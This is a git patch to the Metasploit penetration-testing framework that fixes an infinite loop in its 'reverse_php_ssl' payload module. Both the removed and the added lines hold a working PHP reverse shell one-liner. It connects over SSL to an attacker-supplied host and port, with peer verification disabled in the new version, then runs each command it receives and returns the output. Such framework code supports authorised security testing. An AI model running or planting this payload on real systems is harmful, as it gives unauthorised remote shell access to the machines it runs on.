From a1896737827263b86e81324ec3898820efc26360 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 22 Feb 2018 07:03:52 -0600 Subject: [PATCH] Land #9584, Fix reverse_php_ssl infinite loop --- modules/payloads/singles/cmd/unix/reverse_php_ssl.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index d4740e5e39..bd65a0861e 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 132 + CachedSize = 253 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions @@ -49,6 +49,6 @@ module MetasploitModule lhost = datastore['LHOST'] ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&" + cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&" end end